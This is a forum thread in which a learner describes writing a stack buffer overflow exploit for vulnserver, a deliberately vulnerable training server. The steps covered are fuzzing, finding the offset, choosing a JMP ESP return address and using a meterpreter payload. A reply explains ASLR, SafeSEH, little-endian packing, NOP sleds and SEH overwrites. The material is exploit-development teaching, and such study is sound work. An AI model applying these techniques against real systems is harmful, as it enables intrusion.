If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

Vulnserver And Ollydbg, I Need Some Help With Seh Chains

Lately I have been learning about writing your own exploits using Steve Bradshaw's vulnserver. For those who are unfamiliar, it is a Telnet server that is purposely vulnerable to exploitation. I wrote 1 exploit for it but, I was hoping that someone could point me in the right direction for a couple other exploitation methods that I am having trouble with. I will make these questions red so it's easier to find.

I'll start by telling you what I learned so that way there is no miscommunication.

First off, we use spike, which is a general fuzzer, to push random buffer lengths into a command. We set the command that we want to use by setting the header. Next we just make a string variable to hold our random buffer value and we are off. (PS. I also wrote a BASH script to pump out these scripts because I am lazy)

Pretty simple so far. So next we fuzz the target command using spike's general_send_tcp program. If it crashes it is possible that it is vulnerable to attack. We use wireshark to trace back the packets, vulnserver tells you if the command complete successfully or not. We look for TCP streams that don't have that at the end. I was doing this for the TRUN command which happens to crash around 5000 bytes.

Now we need to write a Perl script to fuzz the target more intelligently. (I also wrote a BASH script to pump these out for me since, yet again, I am lazy.)

So basically a quick look at what is going on. /pentest/exploits/framework/tools/pattern_create.rb $junksize runs a command that creates a traceable pattern so if we overwrite EIP we can use this to trace EIP back and see how many bytes it took to crash it. The header is the command. Next I open ollyDbg on vulnserver and run vulnserver. Then I use my newly created fuzzing script to crash the program, I then take the value of EIP, pop it into the tracing program, and find that it is 2003 bytes in (I am still talking about the TRUN command.)

I pretty much understand everything up to this point, however I am a little fuzzy on the next part :/

Next we write our exploit.
Basically we just fill in that 2003 character space with junk values (For debigging purposes I just use 'A' (\x41))
Next we grab a JMP ESP command from a dll it loads. The reason we do this is because most dlls won't be compiled with ASLR or SafeSEH. Beyond that I don't have a clue why we need this. This is one question I'd love answered. Then we pack the value into Little Endian format. I understand what Little Endian format is but, I don't understand why we need to pack the value like that. The line is

Code:

$eip = pack('V', "0x625011af)

Next we insert our shellcode (I wrote a script to just grab a meterpreter payload and insert it here. The script is at the end of this section)
Next we make a NOP sled. I understand why we use it, however, the tutorial I used for this didn't explain how he arrived at the amount of NOPs he did (He used 20). How do you know how many NOPs to use for your sled? Lastly, we just send it over the wire.

So the exploit works fine. Next, I wanted to try to make my own, however I hit some roadblocks. The command I tried to use was GMON, KSTET, and GTER. All crashed when I used spike fuzzer. However I run into the same problem with each of them. Each one has an extremely small junk space. (GMON was untraceable, I don't think it's overwriting EIP, KSTET only had 66 bytes, GTER only has 147 bytes) I noticed there isn't enough space for the shellcode. I first noticed it when I threw in some breakpoints (\xCC) to the beginning and end of the shell code. It would hit the first one but, not the 2nd. Later I just changed the shell code in my script to \x42 x 1000, I noticed not all of the Bs showed up. I know there is a couple tricks to making shellcode execute from a different location but, the one would prefer to use is over writing the SEH chains, the SEH Chains are an error handling address that gets called when the program crashes, the SEH Chains in vulnserver point to ntdll. What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?

List of questions;

How does the JMP ESP address from a non-ASLR dll help use execute shellcode?

Why do we need to pack the EIP address in little endian format?

How do we know how many NOPs to use in our sled?

What is the proper method for over writing SEH and hiding our shellcode somewhere else?

Re: Vulnserver And Ollydbg, I Need Some Help With Seh Chains

Dont know if this forum is necessarily the right place for this type of question, since its only tangentially related to BT, however since the mods have allowed it I will answer for you.

Beyond that I don't have a clue why we need this. This is one question I'd love answered.

Why do we grab the address of an JMP ESP instruction from a DLL without ASLR and SafeSEH? Because they are exploit prevention techniques that can be bypassed by using DLLs compiled without them. Briefly, ASLR randomises the base address where DLLs are loaded, making it harder for us to predict where instructions located within that DLL will be located when our exploit runs. ASLR only applies when the Operating Systems and the module/dll support it (For Windows this is Vista and upwards). SafeSEH allows a module to specify a set of authorised SE handlers within that module, so that in the event of an exception only those addresses can be used to handle exceptions. This is only important on Operating Systems and modules that support SafeSEH (on Windows its XP SP2 and up) and when you are writing an SEH exploit.

I understand what Little Endian format is but, I don't understand why we need to pack the value like that.

It needs to be packed into little endian format because the processor reads values from the stack in little endian format, where the most significant bytes are to the right. We need to provide the address in the format the CPU is expecting.

How do you know how many NOPs to use for your sled?

Guestimation/trial and error

For stack overflows, I usually start with NOP sleds of 16 to 32 bytes in size, depending on available buffer space. For most of the Vulnserver exploits, NOPsleds are not strictly necessary, I just added them so the reader can see what they are for/how they are used.

What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?

The SEH handler on the stack sometimes gets overwritten during a stack overflow, and if you can make this happen then an SEH exploit may be possible. Vulnserver was written specifically to allow SEH overwrites to occur only in the GMON variable (see here http://resources.infosecinstitute.com/seh-exploit/), however its not probably impossible that you have caused one to occur for one of the other vulnerable commands. I can tell you however that all of the other vulnerable functions can be exploited without the use of SEH overwrites, and that is how they will be shown in future tutorials. In a few cases you need to use those tricks you referred to for executing shellcode from another location in memory (a new tutorial on one of those methods just got posted, but the formatting is still kind of rough at the moment and Im getting it sorted with the Infosec guys), and in others you will need to send the data in a particular format.

Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".